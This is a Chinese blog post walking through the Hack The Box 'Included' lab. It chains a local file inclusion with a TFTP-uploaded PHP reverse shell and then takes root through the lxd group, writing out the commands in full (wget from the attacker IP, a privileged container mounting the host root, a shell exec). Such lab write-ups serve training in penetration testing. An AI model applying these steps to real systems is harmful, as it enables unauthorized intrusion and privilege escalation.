本地文件包含漏洞+TFTP=Getshell|组合拳

最新推荐文章于 2024-04-24 09:02:22 发布
最新推荐文章于 2024-04-24 09:02:22 发布
阅读量7k 收藏
点赞数
文章标签: web安全 linux 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45432774/article/details/123457717
版权

文章声明

安全文章技术仅供参考,此文所提供的信息为漏洞靶场进行渗透,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。

本文所提供的工具仅用于学习,禁止用于其他,未经授权,严禁转载,如需转载私信联系。

文章简介

本文主要记录从本地文件包含漏洞到获取root权限的过程。

涉及知识点

1. 本地文件包含漏洞(LFI)
2. TFTP文件上传
3. LXD提权

靶场环境

1. Hackthebox靶场Included

2. 靶机: Linux操作系统 IP:10.129.95.185

3. 攻击机:连接VPN后的IP:10.10.14.15

演示过程

首先,我使用nmap进行端口收集:

nmap -sV -sC -sT -v 10.129.95.185 -Pn

(假如这里有张图)

发现只有80端口开启,访问如下:

惊奇地发现url地址的传值参数为"?file=/home.php",由于靶场是linux操作系统,我们尝试查看文件/etc/passwd,内容显示如下:

(这样查看有些混乱,我们用curl看一下)

到这一步就是一个简单的任意文件读取漏洞,接下来我们通过读取到的内容getshell。

发现tftp用户,敏锐地查询了TFTP协议,如下:

TFTP(Trivial File Transfer Protocol),简单文件传输协议,TFTP使用UDP协议,TFTP不具备通常的FTP的许多功能,它只能从文件服务器上获得或写入文件,没有列出目录的功能,也不能对用户进行身份鉴别,它传输8位数据。

根据查到的tftp特性,这次使用nmap进行UDP端口扫描:

通过TFTP工具直接连接服务器,并上传反弹shell:

上传木马:

通过任意文件读取可以得知绝对路径为/var/lib/tftpboot

通过文件包含漏洞触发木马(访问http://10.129.95.185/?file=/var/lib/tftpboot/shell.php),反弹shell成功。

查看id,发现权限比较低,继续进行信息收集进而提升权限。

在/var/www/html路径下信息收集获取到mike用户名和密码:

切换用户mike获取到用户权限Flag,同时注意到存在的用户组在lxd组(当用户具有lxd权限时,可以通过创建任意镜像,并将当前系统根目录挂载到镜像mnt目录下,然后通过chroot命令即可获取当前系统的root权限):

接下来进行lxd提权,操作如下:

攻击机:

1.下载lxd镜像生成器

git clone  https://github.com/saghul/lxd-alpine-builder.git

2.构建镜像

cd lxd-alpine-builder  
sudo ./build-alpine

3.开启HTTP服务,下载到靶机上

python3 -m  http.server 8082 -b 0.0.0.0

靶机:

1. 下载攻击机上的alpine-v3.13-x86_64-20210218_0139.tar.gz
wget http://10.10.14.15:8082/alpine-v3.13-x86_64-20210218_0139.tar.gz

2. 导入镜像并成功提权

#导入镜像
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz` --alias test

#初始化镜像
lxc init test test -c security.privileged=true

#挂载磁盘
lxc config device add test test disk source=/ path=/mnt/root recursive=true

#启动镜像
lxc start test

lxc exec test /bin/sh

如果报错就先lxd初始化后在执行上面的操作

lxd init    # 一路回车

获取flag

cat /mnt/root/

 

白帽小白
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
STM32F407 LWIP+tftp远程升级程序
06-27
STM32F407 LWIP+tftp远程升级程序
文件包含漏洞结合ssh登录日志getshell
weixin_54813510的博客
06-26 542
文件包含漏洞)是程序开发人员通常出于灵活性的考虑,会将被包含的文件设置成变量,然后动态调用这些文件。但正是因为调用的灵活性导致用户可能调用一些恶意文件,造成文件包含漏洞文件包含漏洞分为本地文件包含漏洞和远程文件包含漏洞。php中文件包含的函数有:require(),找不到被包含的文件时会产生致命错误,并停止脚本运行。include(),找不到被包含的文件时只会产生警告,脚本将继续运行。include_once()与include()类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含。
文件包含漏洞全面详解
最新发布
heike_Ch的博客
04-24 799
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
Discuz3.4X ssrf漏洞学习与利用
sangfor_edu的博客
06-08 2032
由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务。主要形成原因是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。...
4.5 远程入侵
qq_55202378的博客
07-29 2042
远程入侵
复现防火墙漏洞CVE-2022-41328
zzqzzq11的博客
12-05 616
​ Analysis of FG-IR-22-369 | Fortinet Blog
文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell
cc
02-24 3613
如果网站存在远程文件包含漏洞,攻击者在服务器2号上写一个一句话木马文件,利用网站远程文件包含该文件,并不能Get网站Shell。由于没有存在文件上传点,而我们又需要服务器本地有个文件存在一句话木马代码,这时候我们想到,日志文件记录报错的方法,就是从日志文件中“写入”一句话木马,然后再利用文件包含来执行日志文件中的一句话木马。在该网站根目录下,新建文件FileInclusion,在此文件夹中新建文件include.php,文件内容为。我们可以利用文件包含漏洞读取任意文件,读取文件的时候有利用条件。
文件包含漏洞
qq_46116117的博客
01-03 2323
文件包含漏洞 原理 文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。 在php中,提供了四个文件包含的函数 文件包含函数会将文件包含进去,直接使用包含文件中的代码。 分别为: include(): include ‘filename’; ​ include 只生成警告(E_WARNING),并且脚本会继续 include_once(): ​ 和 include() 语句类似,唯一区别是如果该文件中的代码已经被包含了,则不会再次包含
tftp目录linux目录,Ipswitch TFTP Server目录遍历漏洞
weixin_39684960的博客
04-28 297
发布日期:2011-12-02更新日期:2011-12-05受影响系统:Ipswitch Ipswitch TFTP Server 1.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 50890Ipswitch TFTP Server是免费的网络系统或...
利用文件包含漏洞-getshell
LJH1999ZN的博客
02-22 7214
一、什么是文件包含漏洞 文件包含是指应用程序没有对引用的文件做合理的校验,导致包含的文件中含有恶意的代码,并且执行了该代码。从而产生了文件包含漏洞 二、文件包含漏洞的利用条件 1.引用一个任意类型的文件 2.程序读取文件并且执行 三、将木马程序放入某个本地文件中。 1.利用网站报错日志写入木马程序 2.利用文件上传功能,上传含有木马的任意文件 四、文件包含getshell 1.本地文件包含getshell 网站会将一些错误信息记录到日志文件中,我们可以利用这个特性将木马写入日志文件中去
CVE-2018-12613 phpmyadmin文件包含getshell连载(三)
PANDA墨森的博客
06-24 632
这是phpmyadmin系列渗透思路的第三篇文章,前面一篇文章阐述了通过慢查询日志getshell,本文将通过文件包含漏洞展开讨论 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13164349.html #001 影响版本 Phpmyadmin 4.8.0/4.8.0.1/4.8.1 #002 漏洞验证利用 http://www.xxx.com/index.php?target=db_sql.php%253f/../../../../../../e.
锐捷TFTP 攻击
01-04
锐捷 TFTP server工具!!
基于STM32F407LWIP+TFTP网络升级.zip
02-22
包含STM32F407LWIP+TFTP的IAP程序,应用程序APP,上位机软件。 文档说明:查找我的资源。
putty+tftp.zip
07-31
putty+tftp.zip
Centos6.5全自动安装 vsftpd+dhcp+nfs+tftp
01-11
yum install tftp tftp-server vsftpd dhcp syslinux nfs-utils vim /etc/xinetd.d/tftp service tftp { disable = no socket_type = dgram protocol = udp wait = yes user = root server =
STM32F429+TFTP_IAP
09-19
用STM32F4通过网口UDP的TFTP文件传输进行升级,可下载TFTPD64等软件的功能进行程序升级下载
[VulnHub靶机渗透] HA: Narak
人若无名,便可专心练剑
02-22 1335
学渗透必打百台靶机实操精讲-Narak。涉及UDP突破,TFTP信息泄漏,webdav反弹shell上传。二级提权,第一级通过找到可写bash脚本文件中的brainfuck语句,获得凭据,二级通过motd脚本获得root权限。相比之前的视频,增加了些新知识,值得玩味的攻击链。可以结合靶机实操。
常见端口入侵
weixin_44110913的博客
04-15 2096
20:FTP服务的数据传输端口 21:FTP服务的连接端口,可能存在 匿名登陆 弱口令暴力破解 匿名登陆:1.用nc链接21号端口 2.直接使用USER anonymous PASS xxxx 22:SSH服务端口,可能存在 弱口令暴力破解 23:Telnet端口,可能存在 弱口令暴力破解 25:SMTP简单邮件传输协议端口,和 POP3 的110端口对应 43:whois服务端口 53:DNS服...
SSRF的详解、复现与CTF下的SSRF
sGanYu
12-11 6423
借鉴于教父爱分享 SSRF 由攻击者构造,服务器端发起请求的安全漏洞漏洞属于信息泄露的一种。 一般情况下,SSRF的攻击目标大多是网站的内部系统(正因为请求是由服务器端发起的,所以服务器能请求到与自身相连而与外网隔离的内部系统),只要当前服务器有向其他服务器发送请求的地方都可能存在SSRF漏洞。 SSRF形成的原因 大多数都是由服务端提供了从其他服务器应用获取数据的操作,且没有对目标地址做过滤与限制,比如从指定URL地址获取网页文本内容,加载指定地址的图片文档等等 举个例子:假设现在有两个网站
pxe安装服务器操作系统,使用PXE+DHCP+TFTP+kickstart搭建无人执守系统安装服务器(示例代码)...
05-31
以下是一个搭建无人值守系统安装服务器的示例代码: 1. 配置 DHCP 服务 在 DHCP 服务器上,创建一个新的 DHCP 配置文件 `/etc/dhcp/dhcpd.conf`,并添加以下内容: ``` subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.100 192.168.1.200; option domain-name-servers 8.8.8.8; option routers 192.168.1.1; option broadcast-address 192.168.1.255; default-lease-time 600; max-lease-time 7200; next-server 192.168.1.2; filename "pxelinux.0"; } ``` 这个配置文件指定了 DHCP 服务器的 IP 地址池(192.168.1.100 到 192.168.1.200),DNS 服务器地址(8.8.8.8),网关地址(192.168.1.1),并将默认租约时间设置为 10 分钟。 注意,这个配置文件中的 `next-server` 和 `filename` 属性指定了 PXE 服务器的 IP 地址和启动文件名。在这个示例中,我们将 PXE 服务器的 IP 地址设置为 `192.168.1.2`,将启动文件名设置为 `pxelinux.0`。 2. 配置 TFTP 服务 在 PXE 服务器上,安装 TFTP 服务器软件,并将启动文件 `pxelinux.0` 复制到 TFTP 服务器的根目录下。 3. 配置 Kickstart 文件 创建一个 Kickstart 文件 `ks.cfg`,并将其放置在 PXE 服务器的根目录下。以下是一个示例 Kickstart 文件的内容: ``` # Install OS instead of upgrade install # Use graphical installer graphical # Set up network network --bootproto=dhcp --device=eth0 # Set up root password rootpw --iscrypted $6$SALT$HASH # Configure timezone timezone Asia/Shanghai --utc # Configure partitioning autopart --type=lvm # Configure packages to install %packages @^minimal @core kexec-tools %end ``` 这个 Kickstart 文件将使用图形界面安装 CentOS 操作系统,并自动配置网络、设置 root 密码、设置时区、使用 LVM 分区,以及安装一些基本的软件包。 注意,这个 Kickstart 文件中的 `--bootproto` 参数指定了使用 DHCP 自动配置网络。这个参数的值应该与 DHCP 配置文件中的 `bootproto` 属性保持一致。 4. 配置 PXE 引导文件 创建一个 PXE 引导文件 `pxelinux.cfg/default`,并添加以下内容: ``` default ks prompt 0 timeout 300 label ks kernel vmlinuz append initrd=initrd.img ks=http://192.168.1.2/ks.cfg ``` 这个 PXE 引导文件将使用 `vmlinuz` 和 `initrd.img` 内核文件,以及之前创建的 Kickstart 文件 `ks.cfg` 来启动自动安装程序。 注意,这个 PXE 引导文件中的 `ks` 标签指定了使用 Kickstart 文件自动安装系统,`kernel` 和 `initrd` 属性指定了内核文件,`append` 属性指定了 Kickstart 文件的 URL。 5. 启动 PXE 客户端 现在,启动一个 PXE 客户端并让其从网络引导。在启动过程中,客户端将自动从 DHCP 服务器获取 IP 地址,并下载启动文件 `pxelinux.0`。一旦下载完成,客户端将执行这个启动文件,并自动安装操作系统。 注意,整个过程是无人值守的,只需要启动客户端并等待自动安装完成即可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值